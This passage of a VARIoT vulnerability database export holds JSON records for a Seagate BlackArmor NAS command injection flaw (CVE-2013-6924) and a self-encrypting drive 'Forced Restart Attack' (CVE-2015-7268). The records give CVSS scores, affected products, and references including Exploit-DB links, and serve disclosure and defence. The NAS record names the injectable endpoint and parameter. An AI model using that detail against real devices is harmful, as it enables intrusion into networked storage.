"url": "https://www.seagate.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "VULHUB",
"id": "VHN-85228"
},
{
"db": "BID",
"id": "102336"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "VULHUB",
"id": "VHN-85228"
},
{
"db": "BID",
"id": "102336"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-85228"
},
{
"date": "2017-11-27T00:00:00",
"db": "BID",
"id": "102336"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"date": "2017-11-27T22:29:00.237000",
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-85228"
},
{
"date": "2017-11-27T00:00:00",
"db": "BID",
"id": "102336"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "102336"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samsung 850 Pro/PM851 of SSD and Seagate ST500LT015/ST500LT025 of HDD Vulnerabilities that bypass security functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
}
],
"trust": 0.6
}
}
VAR-201710-0032
Vulnerability from variot - Updated: 2025-04-20 23:25Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow remote attackers to execute arbitrary commands via shell metacharacters in the ip parameter to backupmgt/getAlias.php. Seagate BlackArmor NAS The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. Seagate BlackArmor NAS is a network storage server of Seagate Corporation of the United States, which can provide layered protection, data increment and system backup and recovery for business-critical data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201710-0032",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 2.4,
"vendor": "seagate",
"version": "sg2000-2000.1331"
},
{
"model": "technology llc blackarmor nas sg2000-2000.1331",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "220"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jeroen - IT Nerdbox",
"sources": [
{
"db": "BID",
"id": "64655"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6924",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-6924",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-00095",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-66926",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-6924",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-6924",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-6924",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2014-00095",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201710-307",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-66926",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-6924",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "VULMON",
"id": "CVE-2013-6924"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow remote attackers to execute arbitrary commands via shell metacharacters in the ip parameter to backupmgt/getAlias.php. Seagate BlackArmor NAS The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:\n1. Multiple cross-site request forgery vulnerabilities\n2. Multiple HTML-injection vulnerabilities\n3. An arbitrary code-execution vulnerability\nAttackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. \nBlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. Seagate BlackArmor NAS is a network storage server of Seagate Corporation of the United States, which can provide layered protection, data increment and system backup and recovery for business-critical data",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6924"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "VULMON",
"id": "CVE-2013-6924"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=30725",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-66926",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "VULMON",
"id": "CVE-2013-6924"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6924",
"trust": 3.5
},
{
"db": "BID",
"id": "64655",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "124688",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "30725",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201710-307",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00095",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "30723",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-84090",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-84092",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-61288",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-66926",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-6924",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "VULMON",
"id": "CVE-2013-6924"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"id": "VAR-201710-0032",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "VULHUB",
"id": "VHN-66926"
}
],
"trust": 1.54343433
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
}
]
},
"last_update_date": "2025-04-20T23:25:56.900000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "BlackArmor NAS 220",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/support/external-hard-drives/network-storage/blackarmor-nas-220/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://packetstormsecurity.com/files/124688/seagate-blackarmor-nas-sg2000-2000.1331-remote-command-execution.html"
},
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/64655"
},
{
"trust": 1.8,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90109"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6924"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-6924"
},
{
"trust": 0.7,
"url": "http://www.exploit-db.com/exploits/30725/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "VULMON",
"id": "CVE-2013-6924"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"db": "VULHUB",
"id": "VHN-66926"
},
{
"db": "VULMON",
"id": "CVE-2013-6924"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-66926"
},
{
"date": "2017-10-11T00:00:00",
"db": "VULMON",
"id": "CVE-2013-6924"
},
{
"date": "2014-01-06T00:00:00",
"db": "BID",
"id": "64655"
},
{
"date": "2017-11-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"date": "2017-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"date": "2017-10-11T12:29:00.207000",
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00095"
},
{
"date": "2017-11-03T00:00:00",
"db": "VULHUB",
"id": "VHN-66926"
},
{
"date": "2017-11-03T00:00:00",
"db": "VULMON",
"id": "CVE-2013-6924"
},
{
"date": "2015-03-19T09:05:00",
"db": "BID",
"id": "64655"
},
{
"date": "2017-11-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006781"
},
{
"date": "2017-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201710-307"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2013-6924"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS Command injection vulnerability in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006781"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201710-307"
}
],
"trust": 0.6
}
}
VAR-201711-0010
Vulnerability from variot - Updated: 2025-04-20 23:25Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when used on Windows and operating in Opal mode on Lenovo ThinkPad T440s laptops with BIOS 2.32 or ThinkPad W541 laptops with BIOS 2.21, or in Opal or eDrive mode on Dell Latitude E6410 laptops with BIOS A16 or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by triggering a soft reset and booting from an alternative OS, aka a "Forced Restart Attack.". Samsung 850 Pro/PM851 Solid state drives and Seagate ST500LT015/ST500LT025 There are vulnerabilities in hard disk drives that can bypass security functions.Information may be obtained. LenovoThinkPadT440slaptop is a laptop from Lenovo China. The DellLatitudeE6410laptop is a laptop from Dell. Samsung850Pro, etc. are all hard drives used in laptops. The Samsung850Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung850Pro, PM851 SSD, SeagateST500LT015 and ST500LT025 hard drives on several devices. An attacker with a physical location approach can exploit the vulnerability to bypass self-encrypting hard disk protection by implementing a forced restart attack. Samsung/Seagate Self-Encrypting Drives Protection are prone to a local security-bypass vulnerability. This may aid in further attacks. The following products are vulnerable: Seagate ST500LT015 and ST500LT025 Samsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0010",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pm851",
"scope": "eq",
"trust": 1.6,
"vendor": "samsung",
"version": null
},
{
"model": "850 pro",
"scope": "eq",
"trust": 1.6,
"vendor": "samsung",
"version": null
},
{
"model": "pm851",
"scope": null,
"trust": 1.4,
"vendor": "samsung",
"version": null
},
{
"model": "st500lt015",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt025",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt015",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt025",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "850 pro",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "pro",
"scope": "eq",
"trust": 0.6,
"vendor": "samsung",
"version": "850"
},
{
"model": "technology st500lt015",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
},
{
"model": "technology st500lt025",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt025",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "0"
},
{
"model": "st500lt015",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "0"
},
{
"model": "pm851",
"scope": "eq",
"trust": 0.3,
"vendor": "samsung",
"version": "0"
},
{
"model": "pro",
"scope": "eq",
"trust": 0.3,
"vendor": "samsung",
"version": "8500"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "BID",
"id": "102334"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:st500lt015_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:seagate:st500lt025_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:850_pro_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:pm851_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Boteanu and Kevvie Fowler of KPMG.",
"sources": [
{
"db": "BID",
"id": "102334"
}
],
"trust": 0.3
},
"cve": "CVE-2015-7268",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CVE-2015-7268",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CNVD-2017-38306",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "VHN-85229",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "PHYSICAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.5,
"id": "CVE-2015-7268",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
